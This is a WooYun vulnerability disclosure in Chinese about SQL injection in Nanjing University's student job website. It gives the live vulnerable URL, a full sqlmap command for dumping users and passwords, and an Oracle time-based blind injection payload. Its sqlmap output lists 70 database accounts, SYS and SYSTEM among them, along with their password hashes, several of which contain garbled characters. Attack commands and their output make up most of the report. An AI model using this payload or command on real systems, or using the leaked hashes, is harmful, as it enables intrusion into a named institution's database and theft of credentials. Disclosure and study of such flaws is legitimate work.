当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154189

漏洞标题:南京大学学生就业创业信息网某处存在SQL注入漏洞(DBA权限+70名系统管理员密码泄露)

相关厂商:nju.edu.cn

漏洞作者: 路人甲

提交时间:2015-11-19 18:52

修复时间:2015-11-25 09:00

公开时间:2015-11-25 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

南京大学学生就业创业信息网某处存在SQL注入漏洞(DBA权限+70名系统管理员密码泄露)

详细说明:

地址:http://job.nju.edu.cn:9081/login/nju/home-article.jsp?ID=03789669-6e58-11e5-99b3-5db8f6fbcd47&type=xyzp&XH=1

python sqlmap.py -u "http://job.nju.edu.cn:9081/login/nju/home-article.jsp?ID=03789669-6e58-11e5-99b3-5db8f6fbcd47&type=xyzp&XH=1" -p ID --technique=T --random-agent --current-user --is-dba --users --passwords

漏洞证明:

---
Parameter: ID (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ID=03789669-6e58-11e5-99b3-5db8f6fbcd47' AND 3701=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(80)||CHR(107)||CHR(103),5) AND 'EHZZ'='EHZZ&type=xyzp&XH=1
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'USR_JY_YZ'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ID (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ID=03789669-6e58-11e5-99b3-5db8f6fbcd47' AND 3701=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(80)||CHR(107)||CHR(103),5) AND 'EHZZ'='EHZZ&type=xyzp&XH=1
---
web application technology: JSP
back-end DBMS: Oracle
database management system users [70]:
[*] DBSNMP
[*] DIP
[*] NJUWJGGJSYSMJ
[*] ORACLE_OCM
[*] OUTLN
[*] SNPM
[*] SNPW
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] USR_CARDA
[*] USR_CCS
[*] USR_CCS_NEW
[*] USR_CMS_SERVER
[*] USR_CWCX
[*] USR_CZBZ
[*] USR_CZBZ_YZ
[*] USR_GXSJ
[*] USR_GXSJ_YZ
[*] USR_GY
[*] USR_GY_YZ
[*] USR_IDS
[*] USR_IDS5
[*] USR_ISP_YZ\x02
[*] USR_JY_LSA
[*] USR_JY_YZ
[*] USR_LX_YZ
[*] USR_MSG
[*] USR_MSG_NEW
[*] USR_MSG_NIC
[*] USR_MSG_YZ
[*] USR_NIC
[*] USR_NJUCCS
[*] USR_NJUCCS_YZ
[*] USR_NJUIDS
[*] USR_NJUIDS_YZ
[*] USR_NJUNJFZ
[*] USR_NJUNJFZ_ALL
[*] USR_NJUNJFZ_DZ
[*] USR_NJUNJFZ_GZC
[*] USR_NJUNJFZ_HJXY
[*] USR_NJUNJFZ_HXXY
[*] USR_NJUNJFZ_JSJ
[*] USR_NJUNJFZ_KYMXY
[*] USR_NJUNJFZ_ZXX
[*] USR_NJUOUT_ALL
[*] USR_NJUSJZX
[*] USR_OA_NEW
[*] USR_OA_NEW2
[*] USR_OA_NEW3
[*] USR_PORTAL
[*] USR_PORTAL_YZ
[*] USR_RYXX_RYXX
[*] USR_RYXXK
[*] USR_STUCISP
[*] USR_STUPORTAL!
[*] USR_TPDC\x11\x05
[*] USR_TXL
[*] USR_WLXXZX
[*] USR_XG
[*] USR_XG_YZ
[*] USR_XY
[*] USR_YX_HOSPITAL
[*] USR_YX_YZ
[*] USR_ZS
[*] USR_ZS_YZ
[*] USR_ZXBZ
[*] USR_ZXBZ_YZ
[*] USR_ZZF
[*] WISEDU
database management system users password hashes:
[*] DBSNMP [1]:
password hash: E066D214D5421CCC
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
[*] ORACLE_OCM [1]:
password hash: 6D17CF1EB1611F94
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
[*] SNPM [1]:
password hash: EF04D202FFAE7836
[*] SNPW [1]:
password hash: F6E55592FB66FBB9
[*] SYS [1]:
password hash: D4C5016086B2DC6A
[*] SYSTEM [1]:
password hash: D4DF7931AB130E37
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
[*] USR_CCS [1]:
password hash: 79051574A969A3FA
[*] USR_CCS_NEW [1]:
password hash: CED424D0D4FF10D4
[*] USR_CMS_SERVER [1]:
password hash: 320049A161705109
[*] USR_CWCX [1]:
password hash: 0510E160E3DF8C13
[*] USR_CZBZ [1]:
password hash: E48685891F444C02
[*] USR_CZBZ_YZ [3]:
password hash: AE18801179D04F19
password hash: NULL
password hash: \x11
[*] USR_GXSJ_YZ [1]:
password hash: E646D0EADE08E4B3
[*] USR_GY [1]:
password hash: 5C5A21577DA2ECB5
[*] USR_GY_YZ [1]:
password hash: 20BB76DD9CE62E81
[*] USR_IDS [1]:
password hash: 3F30DBF71179CF5C
[*] USR_IDS5 [1]:
password hash: 64EDCEE8ACA32CF3
[*] USR_JY_YZ [3]:
password hash: F55C84A260886222
password hash: NULL
password hash: \t
[*] USR_LX_YZ [1]:
password hash: F84B4C77A7590C76
[*] USR_MSG [1]:
password hash: 6D5291700419A519
[*] USR_MSG_NEW [5]:
password hash: A
password hash: D7C366F3DDA83611
password hash: NULL
password hash: \t
password hash: \x03\x11
[*] USR_MSG_YZ [1]:
password hash: ACF68D242AF1F164
[*] USR_NIC [1]:
password hash: BA06C66EE4BFF3E0
[*] USR_NJUCCS [1]:
password hash: 253752D07C08A4D8
[*] USR_NJUCCS_YZ [1]:
password hash: 46569F797BB1A088
[*] USR_NJUIDS [1]:
password hash: C1B2C51D6F2C2647
[*] USR_NJUNJFZ [1]:
password hash: 8381F9DA25A5F\\?81AA
[*] USR_NJUNJFZ_ALL [1]:
password hash: 9B177C9AEDE7D945
[*] USR_NJUNJFZ_DZ [1]:
password hash: CB27F8B01875B69C
[*] USR_NJUNJFZ_GZC [1]:
password hash: 020C1E38862CB006
[*] USR_NJUNJFZ_HJXY [1]:
password hash: C5DA5F0982438B37
[*] USR_NJUNJFZ_HXXY [1]:
password hash: 77C9B84DFA15EDA0
[*] USR_NJUNJFZ_JSJ [1]:
password hash: E6EA204A11337A84
[*] USR_NJUNJFZ_KYMXY [1]:
password hash: 72CADB4453F7A1CD
[*] USR_NJUNJFZ_ZXX [1]:
password hash: 3075DD1700ACEB6F
[*] USR_NJUSJZX [1]:
password hash: 6E2C01C41C430F81
[*] USR_OA_NEW [1]:
password hash: 550D6D9A38E69061
[*] USR_OA_NEW2 [2]:
password hash: 89899E4DC469A197
password hash: NULL
[*] USR_OA_NEW3 [1]:
password hash: 5E8A3DB3C3489F05
[*] USR_PORTAL [1]:
password hash: 38AFF7A3F15B2358
[*] USR_PORTAL_YZ [1]:
password hash: 0DA972CA05DD7F0A
[*] USR_RYXX_RYXX [1]:
password hash: BA9EB83502C026D4
[*] USR_RYXXK [1]:
password hash: 865AA0BC0E8D0EF3
[*] USR_STUCISP [1]:
password hash: 09AE10C068E02E18
[*] USR_TXL [1]:
password hash: A2E7E655FE24A7F6
[*] USR_WLXXZX [1]:
password hash: 9C8605153B2C6893
[*] USR_XG [1]:
password hash: DAEC1333B88743A3
[*] USR_XG_YZ [1]:
password hash: 25E3ADEE3FBAE83C
[*] USR_XY [1]:
password hash: D182BA3EFE30F97C
[*] USR_YX_HOSPITAL [1]:
password hash: 3802C13887C5FA17
[*] USR_YX_YZ [1]:
password hash: B502269C86ABD103
[*] USR_ZS [1]:
password hash: CD399B0FA02C460A
[*] USR_ZS_YZ [1]:
password hash: 6A88BDCE9F908FC6
[*] USR_ZXBZ [1]:
password hash: C8A48256BE173AE3
[*] USR_ZXBZ_YZ [1]:
password hash: 0E40C096976B8D6C
[*] USR_ZZF [1]:
password hash: 2F350296870EEB60\x11
[*] WISEDU [1]:
password hash: 37E618715B1A3C6A\x05

修复方案:

增加过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-25 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无